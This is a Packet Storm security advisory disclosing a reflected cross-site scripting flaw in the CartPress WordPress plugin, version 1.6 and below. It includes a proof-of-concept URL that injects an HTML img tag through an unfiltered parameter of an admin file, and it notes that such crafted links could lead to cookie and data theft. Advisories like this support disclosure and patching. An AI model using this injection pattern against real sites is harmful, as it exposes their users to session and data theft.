WordPress CartPress plugin versions 1.6 and below suffer from a cross site scripting vulnerability.
985ac8c36def5c03f8e2ef13691b338c# Exploit Title: CartPress plugin for Wordpress XSS
# Date: 12/31/2011
# Author: 6Scan (http://6scan.com) security team
# Software Link: http://wordpress.org/extend/plugins/thecartpress/
# Version: <=1.6 (fix was added to existing 1.6)
# Tested on: Linux
# Description: Due to lack of filtering, malicious users could craft links, that would cause cookie and data theft
# Official fix: XSS was in a file, that was no longer used. An update to the version deleted the file (Version was not advanced)
PoC:
http://hostname/wp-content/plugins/thecartpress/admin/OptionsPostsList.php?tcp_options_posts_update=sdf&tcp_name_post_234=%3Cimg%20src=http://www.bing.com/az/hprichbg?p=rb%2fOrcaWhales_ROW818916751.jpg%3E&tcp_post_ids[]=234
© 2012 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments
No comments yet, be the first!